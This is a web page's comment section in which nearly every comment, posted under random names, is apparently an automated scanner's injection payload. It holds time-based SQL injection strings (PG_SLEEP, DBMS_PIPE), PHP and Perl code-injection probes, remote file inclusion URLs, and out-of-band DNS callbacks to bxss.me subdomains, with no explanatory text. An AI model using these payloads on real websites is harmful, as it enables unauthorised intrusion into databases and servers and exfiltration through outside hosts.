❤️🌹

96 comments

DExWtSbs

DExWtSbs

555

DExWtSbs

DExWtSbs

555

DExWtSbs

DExWtSbs

@@UywBK

DExWtSbs

DExWtSbs

1

����%2527%2522

DExWtSbs

DExWtSbs

1’"

DExWtSbs

DExWtSbs

555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR||CHR||CHR,15)||’

DExWtSbs

DExWtSbs

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR||CHR||CHR,15)

DExWtSbs

DExWtSbs

nVlZ366f’)) OR 803=(SELECT 803 FROM PG_SLEEP(15))—

DExWtSbs

DExWtSbs

iqodTjuO’) OR 393=(SELECT 393 FROM PG_SLEEP(15))—

DExWtSbs

DExWtSbs

wqGYAClw’ OR 85=(SELECT 85 FROM PG_SLEEP(15))—

DExWtSbs

DExWtSbs

1)) OR 331=(SELECT 331 FROM PG_SLEEP(15))-

DExWtSbs

DExWtSbs

5) OR 199=(SELECT 199 FROM PG_SLEEP(15))-

DExWtSbs

DExWtSbs

5 OR 613=(SELECT 613 FROM PG_SLEEP(15))-

gvDIgrDT

gvDIgrDT

1some_inexistent_file_with_long_name

.jpg

'.print(md5(31337)).'

'.print(md5(31337)).'

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

${@print(md5(31337))}\

${@print(md5(31337))}\

555

gvDIgrDT

gvDIgrDT

555

bxss.me

bxss.me

555

${@print(md5(31337))}

${@print(md5(31337))}

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

“.gethostbyname(lc(”hitwj".“roacwpoldd43c.bxss.me.”)).“A”.chr(67).chr(hex(“58”)).chr(103).chr(68).chr(111).chr(74)."

http://bxss.me/t/fit.txt?.jpg

http://bxss.me/t/fit.txt?.jpg

555

";print(md5(31337));$a="

";print(md5(31337));$a="

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

‘.gethostbyname(lc(’hitqe’.‘ufwcaxwgac954.bxss.me.’)).‘A’.chr(67).chr(hex(‘58’)).chr(111).chr(80).chr(114).chr(84).’

Http://bxss.me/t/fit.txt

Http://bxss.me/t/fit.txt

555

';print(md5(31337));$a='

';print(md5(31337));$a='

555

gvDIgrDT

gvDIgrDT

555

".gethostbyname(lc("hitbp"."vnhiiovwb8be2.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(87).chr(114).chr(90)."

".gethostbyname(lc("hitbp"."vnhiiovwb8be2.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(87).chr(114).chr(90)."

555

1some_inexistent_file_with_long_name�.jpg

1some_inexistent_file_with_long_name.jpg

555

;print(md5(31337));

;print(md5(31337));

555

'.gethostbyname(lc('hitve'.'wijyjsad81855.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(75).chr(102).chr(69).'

'.gethostbyname(lc('hitve'.'wijyjsad81855.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(75).chr(102).chr(69).'

555

gvDIgrDT

gvDIgrDT

555

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

gvDIgrDT

gvDIgrDT

555

Leave a comment